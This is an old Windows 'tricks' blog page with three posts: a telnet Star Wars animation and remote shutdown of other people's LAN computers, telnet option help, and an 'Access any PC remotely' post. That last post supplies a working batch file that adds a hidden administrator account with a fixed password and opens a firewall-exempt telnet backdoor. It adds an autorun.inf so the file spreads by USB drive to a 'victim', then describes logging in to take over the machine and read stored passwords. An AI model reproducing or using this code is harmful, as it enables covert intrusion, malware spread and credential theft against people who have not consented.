Some Command Prompt Tricks

March 21, 2009 Posted By: Jim ~ Filed under Category: Cool tricks

Last night i was cleaning Junk from my PC. Because .. I test lots of freewares to find out best freeware programs for my needs. Then i found found some Command Prompt tricks i collected few years ago. This trick are Old but still.. If you want to have some fun with command prompt , here is some…

Watch A Movie Created with Command Prompt

command prompt movie Some Command Prompt Tricks

STAR WARS MOVIE

Command prompts movie..!! amazing Creation. But you need active internet connection to enjoy this movie. It’s a star wars movie. Here is how to watch this movie :

1. Go to Start > Run and type in cmd

2. You will see the command prompt window . Now type in this command line.

telnet towel.blinkenlights.nl

And hit Enter. Now enjoy the Star wars Movie.

Shutdown PC On your LAN Network

Remote ShutDown

Remote Shutdown

This trick will shutdown a selected pc from Your LAN network. You can apply this trick in your office or school.. but i take no responsibilities fro any action. Its just for fun. Here is how to use this trick :

1. Go to Start > Run and type in cmd

2. You will see the command prompt window . Now type in this command line.

shutdown.exe -i

And hit Enter. You will see remote shutdown Window. If you know someone’s IP on a computer in your Local Area network, type in their IP Address after clicking the add button.

3. After entering the IP Address click OK . Now watch the person’s face as their computer shuts down.

Some users have asked me that they got Access Denied error for remote shutdown.  Add the user with the privilege to force a remote shutdown on the computer you are about to Shutdown.To do this go to control panel > Administrative Tools > Local Security Settings. Now go to Security Settings > Local Policies > User Rights Assignment. Double-click on Force shutdown from a remote system in the right pane and Click on Add User or Group. Add the computer that runs the remote shutdown command.

Continue reading »

Tags for the article:

    command prompt tricks,command prompt hacks,cool command prompt tricks,cmd prompt tricks,cmd tricks,cmd commands tricks,cool cmd commands,command prompt tricks and hacks,tricks with command prompt,command prompt trick

Telnet commands Windows XP

December 07, 2007 Posted By: Jim ~ Filed under Category: Hacks, Windows

telnet [-a][-e escape char][-f log file][-l user][-t term][host
[port]]
-a Attempt automatic logon. Same as -l option except uses
the currently logged on user’s name.
-e Escape character to enter telnet client prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system.
Requires that the remote system support the TELNET ENVIRON
option.
-t Specifies terminal type.

Tags for the article:

    telnet commands,telnet commands in windows,windows telnet command,telnet tutorial windows xp,windows xp telnet commands,telnet commands in windows xp,windows telnet commands,telnet command,telnet commands windows,telnet command windows

Access any PC remotely !

October 27, 2007 Posted By: Jim ~ Filed under Category: Hacks, Pc Tips

Don’t trust Your Friend.. Lol.. Here what he can Do!! Always Check Your User Accounts.

If you have physical access to ur friends machine then u can access his machine remotely using telnet server. All u have to do is to create a user account there then hide that user from logon screen and then start telnet server and finally mark telnet as a exception in firewall.These stepes can be carried out simply and faster using a simple batch file(instal.bat). Here i m providing the source of batch file:

instal.bat

@echo OFF
net user IE_USR 123456 /add
net localgroup administrators IE_USR /add
net localgroup “remote desktop users” IE_USR /add
sc config tlntsvr start= auto
netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe iexplorer enable
sc start tlntsvr
reg add “HKLM\software\microsoft\windows NT\CurrentVersion\winlogon\specialaccounts\UserList” /v IE_USR /t REG_DWORD /d 0

Now u can make this file to spread from one machine to another according to ur own method like to spread this file as a autoplay program in pen drives. Here i m providing u the code for autoplaying just put these two files in pen drive and u r work is done.

autorun.inf

[autorun]
open=instal.bat
when the victim plug this pen drive in his/her PC instal.bat runs and it will do all the work for u then u meet ur frnd online on yahoo msgr and use start>run>netstat -n 4 [press enter] to find his ip address. After getting the ipaddress goto start>run>telnet ipaddress [press enter] now press y and then use these login detail to get login

username: IE_USR
password: 123456

Now u have the shell prompt of friend machine now u can do anything u can see what task are running there using tasklist command, u can shutdown his machine using shutdown -s, u can even get stored password from registry, u can do almost everthing from command prompt.

Tags for the article:

    pocket pc remote desktop